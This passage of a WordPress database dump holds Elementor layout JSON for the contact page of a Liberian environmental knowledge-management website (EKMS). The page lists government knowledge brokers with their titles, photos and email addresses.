Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23459,3412,'_elementor_edit_mode','builder'),(23460,3412,'_elementor_template_type','wp-page'),(23461,3412,'_elementor_version','3.0.16'),(23462,3412,'_wp_page_template','default'),(23463,3412,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong>\\n<p>Marketing and Forest Forecast \\n<\\/br>\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Uriah Garsinii <\\/strong>\\nLand Use Management Manager <\\/br>\\nLLA\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a 